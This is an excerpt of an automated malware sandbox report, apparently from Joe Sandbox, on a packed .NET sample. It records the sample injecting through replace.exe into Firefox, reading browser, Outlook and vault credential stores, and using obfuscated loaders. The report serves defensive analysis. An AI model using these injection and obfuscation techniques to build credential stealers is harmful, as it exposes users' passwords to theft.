                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\replace.exeFile created: C:\Users\user\AppData\Local\Temp\C3vB7APKJump to behavior
                  Source: MR-239-1599-A.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: MR-239-1599-A.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: replace.exe, 00000006.00000003.2154596324.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4091676054.0000000002CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: MR-239-1599-A.scr.exeReversingLabs: Detection: 50%
                  Source: unknownProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                  Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"Jump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: riched20.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: usp10.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: msls31.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: MR-239-1599-A.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: MR-239-1599-A.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: MR-239-1599-A.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: replace.pdb source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: replace.pdbGCTL source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092277586.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033012874.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MR-239-1599-A.scr.exe, MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PIqH.pdb source: MR-239-1599-A.scr.exe
                  Source: Binary string: PIqH.pdbSHA256\;<D source: MR-239-1599-A.scr.exe

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  Source: 0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                  .NET source code contains potential unpacker
                  Source: MR-239-1599-A.scr.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: MR-239-1599-A.scr.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.cs.Net Code: QWNOFBoaaq System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.cs.Net Code: QWNOFBoaaq System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.cs.Net Code: QWNOFBoaaq System.Reflection.Assembly.Load(byte[])
                  Source: 6.2.replace.exe.3a0cd08.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 6.2.replace.exe.3a0cd08.2.raw.unpack, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                  Source: 9.0.DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe.285cd08.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 9.0.DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe.285cd08.1.raw.unpack, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 0_2_078636D9 push ebx; iretd 0_2_078636DA
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00416023 push ds; ret 3_2_00416071
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00404834 push ebx; ret 3_2_00404835
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040A036 push es; ret 3_2_0040A039
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004119A0 pushfd ; iretd 3_2_004119B2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00409A42 push ecx; ret 3_2_00409A46
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040D276 push ebx; retf 3_2_0040D29A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040D214 push ecx; iretd 3_2_0040D215
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00418B17 push ss; retf 3_2_00418B1B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004074E7 pushad ; iretd 3_2_004074F3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00403490 push eax; ret 3_2_00403492
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00409D5A push cs; retf 3_2_00409D5B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_00406524 push es; iretd 3_2_00406530
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_004145D8 pushfd ; ret 3_2_004145D9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0040CE54 push cs; iretd 3_2_0040CE5B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C225F pushad ; ret 3_2_014C27F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C27FA pushad ; ret 3_2_014C27F9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F09AD push ecx; mov dword ptr [esp], ecx3_2_014F09B6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C283D push eax; iretd 3_2_014C2858
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E225F pushad ; ret 6_2_033E27F9
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E27FA pushad ; ret 6_2_033E27F9
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034109AD push ecx; mov dword ptr [esp], ecx6_2_034109B6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E283D push eax; iretd 6_2_033E2858
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E135E push eax; iretd 6_2_033E1369
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C1231D push edi; retf 6_2_02C12328
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C04054 pushad ; iretd 6_2_02C04060
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C065AF push ecx; ret 6_2_02C065B3
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0E50D pushfd ; iretd 6_2_02C0E51F
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C1ABE0 push ebx; ret 6_2_02C1ABE1
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C12B90 push ds; ret 6_2_02C12BDE
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C06BA3 push es; ret 6_2_02C06BA6
                  Source: MR-239-1599-A.scr.exeStatic PE information: section name: .text entropy: 7.975940518665788
                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, jeGWLloVI2hnVphZ5y.csHigh entropy of concatenated method names: 'Dispose', 'nkY9sajxcR', 'UVhlbj7kKS', 'RCmSSKZIFW', 'ntO9XxgnaZ', 'nXp9z3WFTI', 'ProcessDialogKey', 'guql644pJ8', 'yDwl9SCpP2', 'J8TllXH0yf'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, f5UW06mjXs7jtxJbWe.csHigh entropy of concatenated method names: 'wgoTo1shwf', 'GNdT7O3r7c', 'i9hTA6vxDC', 'dMdTNyCjeJ', 'dB8Truk2uH', 'oo2T1veB0D', 'zv7Td1wu9M', 'YgaTuys0XS', 'GmlTgwdUZI', 'utdTBmkp2j'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, EWZS8KgBQ1SjXUPd3s.csHigh entropy of concatenated method names: 'cf2TC42oI1', 'UmxTb8GKYZ', 'AdYTDpGtvt', 'u5CTVpJfyn', 'WWgTUHS1HC', 'vY7TQpdCil', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, YfbHw9A3OWheUacCwH.csHigh entropy of concatenated method names: 'iIP1cfg2V8', 'sOk1292TIf', 'B6V1FcijeJ', 'Qnj1HIORRc', 'rwh1G1jMwj', 'Wav1YRabu1', 'ukf1aCumFZ', 'TWr135bfic', 'jrF1vCyXLe', 'Cf61qsa2at'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, jt9KnjxnASqP3WYaln.csHigh entropy of concatenated method names: 'xwDZ3jQSj3', 'xguZvSFtlZ', 'URWZCu4CWD', 'CCKZb8L4nC', 'PDNZVQixIn', 'ecbZQFQxVL', 'zIJZfvIe68', 'T8qZ0pMMSw', 'c6PZxWT37Z', 'wd3Z5hNdlX'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, UG6td3llIR9rgOKs6jX.csHigh entropy of concatenated method names: 'ToString', 'Mh3pRrRuYQ', 'ikVpOSSvCZ', 'FcKpKnk9pw', 'OfCpouflbi', 'yeYp7rwUHY', 'PpmpAuX6lv', 'W2wpNNVZCj', 'P2gVdFm8rlcobIP19Y4', 'X5EuRSmqk0fByivspS8'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.csHigh entropy of concatenated method names: 'eTARKr6OGS', 'VXIRo8wwpX', 'i62R7AHh5j', 'XOuRAW4fWA', 'jZ0RNemBwe', 'YotRrW1RDn', 'dvcR1AjE78', 'a4mRdwvjkH', 'dBGRubcLC2', 'qNIRgPsnhe'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, rOV05hdnMaAwoBl9VE.csHigh entropy of concatenated method names: 'gh4txmaOnM', 'prsthVtHJd', 'zn0tUV7ImS', 'C9PtPhcNdc', 'h5mtbgkd37', 'fxttDs1WKX', 'nWPtVnc2El', 'Y75tQHseUG', 'QQptjXc9D9', 'T5LtfF8m5e'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, pHbTOilnNQERVelq1Nj.csHigh entropy of concatenated method names: 'SCTwcVWh9P', 'BF1w26dIYL', 'opxwFefsTV', 'YnuwH0khrl', 'dDSwGecSvb', 'bfrwY62fTa', 'mcgwayFaRl', 'rQww3TnXh1', 'TCrwv2nGy4', 'krowqN1Erj'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, gfiBMJyWKejJe42fYy.csHigh entropy of concatenated method names: 'Jh87Uogr84', 'eUS7Plyg2W', 'hbV7mSXctj', 'Xhj7L3lAHc', 'kpp7MKrKTr', 'oGX7nyq28f', 'ggn7e9N1VI', 'Euy7WZDWt4', 'a4V7saBgGR', 'sXb7X1ZISI'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, gYKgd0MLh6yXr5VUv7.csHigh entropy of concatenated method names: 'OMBw9idA4a', 'r7IwROhpql', 'vCZwO9uBeL', 'UASwoa7ZfF', 'ghww7JxR9y', 'WwOwNgNIWY', 'ujtwr12qgc', 'tcqTeLPNkX', 'LhiTWfnHKQ', 'DCtTsb7uCk'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, WenmsXZSyAlyLHifLm.csHigh entropy of concatenated method names: 'CnDAHjK6K5', 'KV8AY3yZ2i', 'kh0A3UgYoH', 'BoQAvmmxZ5', 'OaDAtSHyBw', 'cI4A4JsNll', 'XqBAIoVUAe', 'UvAAT1LSN1', 'fBVAwtC7kO', 'VbVApbbTV9'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, ICg2D8UVrD90QdAE7q.csHigh entropy of concatenated method names: 'NYS91uMEac', 'Nli9dvLEGO', 'tF69g6miqK', 'f9S9BGwvVy', 'vh59tU5Yad', 'HRv94LcPCZ', 'Haj7ptMnh5xuH9bJFv', 'Gvpfrx44eOyuhUah2Y', 'CxV99pfpwG', 'kgM9R5qxX7'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, cVp9pOw4ANeBGqIjQl.csHigh entropy of concatenated method names: 'oXp1ocUooF', 'MV11AQ0WDk', 'XMC1rcgb0H', 'w20rXsTZyZ', 'cQBrzU3gM2', 'x4E1695jvZ', 'fUJ19iKuAd', 'uYQ1lR7oK0', 'kvR1R2Logy', 'gG31OvQyt6'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, SRhXgb0DVNYSBAXbY9.csHigh entropy of concatenated method names: 'oq7rK2yaiX', 'Ncfr7Dv0Vw', 'dUXrN9OcgX', 'Rtbr1dSERL', 'C81rdMtUbx', 'A2qNMFW0i7', 'bYvNnC6MWK', 'n7CNe5qy0I', 'WdkNW8epWR', 'kANNsT7ZcD'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, TLbrSjzEKrBfQYgva3.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NkgwZ2ldmd', 'qtlwtoKC8i', 'r9Gw4OadNQ', 'C5owIjJsLb', 'RZrwTMSHTW', 'B8cwwj1vJ7', 'qcDwpREaBQ'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, MLP0hfDV1Bw7qEXpZX.csHigh entropy of concatenated method names: 'dfnNGB9U9l', 'w4mNaU4QKc', 'hhvADLCb53', 'jivAVKW28a', 'n6uAQoUN3S', 'CGAAjEVu7e', 'rnqAf4ASOU', 'KxeA0hnI3y', 'OGmAi44HtP', 'k3HAx26Cy1'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, RLFqHSalOrbFLciQf7.csHigh entropy of concatenated method names: 'Hr8FQd5nT', 'rF1HwNJmb', 'QfsYcDpBs', 'GlVadgYW5', 'P1yvq8rmD', 'ny5qVSbyq', 'vZXlyLUvUK8dwQiLVt', 'cZdwF05HTXLW6WquiT', 'V7mTqTqMx', 'bIDpk0vY6'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, MxwruClEusiXWiZ7Wr9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'U2lpUCfiip', 'AnWpPnbKSw', 'dKgpmnlYQN', 'LfDpLMafEf', 'PRkpM8JW2v', 'OuIpneDwuy', 'zanpeZ7Iow'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, MJt63Q3lLf7UpSTfT7.csHigh entropy of concatenated method names: 'g0YIWPr6l4', 'DApIXmceuX', 'JcyT6p5SfC', 'pmrT9HFC3F', 'yBXI5uPuty', 'LLLIhfDh24', 'YgaI83sTLv', 'yQyIU4iA4t', 'YdyIPllPbx', 'PcHImWs5rF'
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, bvbg2yKHFkEHYVFsdT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mB8lsPhtrI', 'nCnlXkmHNP', 'f2DlzFTUQd', 'BKqR65V3I4', 'R4dR9c1YeT', 'q7QRlE7Cnp', 'ThDRRkdFtN', 'uI1nLF96oWJYAquFkm9'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, jeGWLloVI2hnVphZ5y.csHigh entropy of concatenated method names: 'Dispose', 'nkY9sajxcR', 'UVhlbj7kKS', 'RCmSSKZIFW', 'ntO9XxgnaZ', 'nXp9z3WFTI', 'ProcessDialogKey', 'guql644pJ8', 'yDwl9SCpP2', 'J8TllXH0yf'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, f5UW06mjXs7jtxJbWe.csHigh entropy of concatenated method names: 'wgoTo1shwf', 'GNdT7O3r7c', 'i9hTA6vxDC', 'dMdTNyCjeJ', 'dB8Truk2uH', 'oo2T1veB0D', 'zv7Td1wu9M', 'YgaTuys0XS', 'GmlTgwdUZI', 'utdTBmkp2j'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, EWZS8KgBQ1SjXUPd3s.csHigh entropy of concatenated method names: 'cf2TC42oI1', 'UmxTb8GKYZ', 'AdYTDpGtvt', 'u5CTVpJfyn', 'WWgTUHS1HC', 'vY7TQpdCil', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, YfbHw9A3OWheUacCwH.csHigh entropy of concatenated method names: 'iIP1cfg2V8', 'sOk1292TIf', 'B6V1FcijeJ', 'Qnj1HIORRc', 'rwh1G1jMwj', 'Wav1YRabu1', 'ukf1aCumFZ', 'TWr135bfic', 'jrF1vCyXLe', 'Cf61qsa2at'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, jt9KnjxnASqP3WYaln.csHigh entropy of concatenated method names: 'xwDZ3jQSj3', 'xguZvSFtlZ', 'URWZCu4CWD', 'CCKZb8L4nC', 'PDNZVQixIn', 'ecbZQFQxVL', 'zIJZfvIe68', 'T8qZ0pMMSw', 'c6PZxWT37Z', 'wd3Z5hNdlX'
